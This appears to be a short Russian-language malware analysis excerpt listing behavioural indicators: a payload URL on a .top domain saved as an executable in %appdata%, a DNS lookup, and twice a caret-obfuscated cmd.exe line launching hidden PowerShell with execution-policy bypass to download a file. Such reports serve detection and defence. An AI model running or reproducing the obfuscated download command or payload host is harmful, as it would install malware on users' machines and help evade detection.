Техническая информация
- http://zofelaseo.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^w^ERSH^ElL.exe^ ^-ExeCU^T^IoNPo^LI^cy byp^aSs^ ^-^nO^p^Ro^f^ilE -W^INDoWSTYle^ h^i^D^deN (nE^W-o^b^Jec^T ^S^YS^Tem.N^E^t^.w^E^BC^li^ENT).DowN^lOA^Df^ILe^(^'http://...
- DNS ASK zo###aseo.top
- '<SYSTEM32>\cmd.exe' /c "p^o^w^ERSH^ElL.exe^ ^-ExeCU^T^IoNPo^LI^cy byp^aSs^ ^-^nO^p^Ro^f^ilE -W^INDoWSTYle^ h^i^D^deN (nE^W-o^b^Jec^T ^S^YS^Tem.N^E^t^.w^E^BC^li^ENT).DowN^lOA^Df^ILe^(^'http://...' (со скрытым окном)